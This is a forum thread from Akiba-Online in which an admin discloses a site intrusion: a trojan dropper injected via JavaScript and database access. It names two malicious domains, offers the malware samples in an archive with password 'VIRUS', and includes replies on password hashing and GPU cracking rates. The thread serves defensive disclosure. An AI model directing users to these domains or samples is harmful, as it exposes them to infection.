Malicious script inserted into our site

Status
Not open for further replies.
R

Rollyco

Team Tomoe
Oct 4, 2007
3,554
34
0
www.yamanakatomoe.com
Sorry for the downtime, everyone.

We suffered an intrusion and had to shut the site down in order to conduct a security audit. It took so long because real-life responsibilities were taking up all of my time.

The attacker inserted a trojan dropper into the site. You may have noticed antivirus warnings while browsing the site. We don't know the exact nature of the trojan, but if you regularly visit Akiba-Online with an old version of your browser or Java/Flash/etc plugins, or noticed strange prompts, you might want to conduct a full system scan to ensure that you weren't infected with anything.

The attacker also had access to the database. If you have an easy-to-guess password on Akiba-Online, you might want to change it. Also, if you use the same password on other sites, you may want to visit those sites and change the password.

FYI: a good password is randomly generated, at least 14 characters long, and used only on one site. Google search for "random password generator".

If you have any concerns or comments, post in this thread.
 
For those that are interested, the malicious domains were akiba-online[dot]ipq[dot]co and xxl[dot]collegeslutz[dot]com. Do not visit those sites unless you know what you're doing. They are dangerous.

Attached to this post is the malicious javascript inserted into our pages and a java applet downloaded by the dropper. The archive password is VIRUS. Do not download unless you know what you're doing. If anybody wants to take a look and comment, feel free. (Java developers, can you deobfuscate?)
 
Thank you

Thank you for taking time to root out the virus, malware, etc. I have noticed unrelated I am sure to this that my Google/Chrome browsing often is redirected to tell me "this page cannot be displayed" or some variation of the message. I guess after awhile it comes with the territory? Such is life! Compared to not too many years ago, browsing is much quicker even with dealing with these annoyances. Still...
Jim
 
Yes, the passwords are hashed using a md5(md5($pass).$uniquesalt) scheme. However, GPU bruteforcing can crack short passwords and easy-to-guess passwords rather quickly. An nVidia GTX250 can hash 140 million vBulletin passwords per second.
 
Would a 9 character password be considered short? o.o Also, thanks for letting us know.
 
Sergil said:
Would a 9 character password be considered short?
Click to expand...
That depends. "iloveyou1" is too easy to crack. "xoF$^JX63" is adequate. If your account is valuable in some way (you are staff, or you have enemies), 9 random characters are absolutely not enough.
 
was the intrusion due to an already known VB vulnerability (without going into details)?
 
good job. good job ^___^.

thank you, rollyco & others. for your constant hard efforts to keep this site going.
 
Can only access the site through Google. Typing "akiba-online.com", which always opened the site, now displays only a blank page with "akiba-online is back" in the upper-left corner.
 
I got :scared: not because of the hacker.. but because I cant access any good porn for the past 2 days :pandalaugh:

Ahahahha anyway.. Its a good thing he didnt flush the account database :rofl:
 
gyoza said:
Can only access the site through Google. Typing "akiba-online.com", which always opened the site, now displays only a blank page with "akiba-online is back" in the upper-left corner.
Click to expand...

same here
 
Status
Not open for further replies.
Top Bottom